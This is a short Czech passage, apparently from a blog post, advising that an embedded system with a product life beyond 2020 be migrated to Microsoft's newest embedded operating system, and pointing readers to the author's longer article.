Zda má smysl přesunout existující projekt (se všemi prací, která vyžaduje stabilitu testování), závisí na několika klíčových otázkách. Řekl bych však, že otázka migrace se opravdu scvrkává na problém životnosti produktu. Pokud plánujete nadále aktivně prodávat a rozvíjet svůj systém nad rámec roku 2020, měli byste se opravdu snažit migrovat na nejnovější a největší vložený operační systém společnosti Microsoft.
Pokud byste se chtěli dozvědět více o krocích migrace, o výkonu a cenovém rozdílu mezi dvěma OS, vyzývám vás, abyste si přečetli můj hloubkový článek.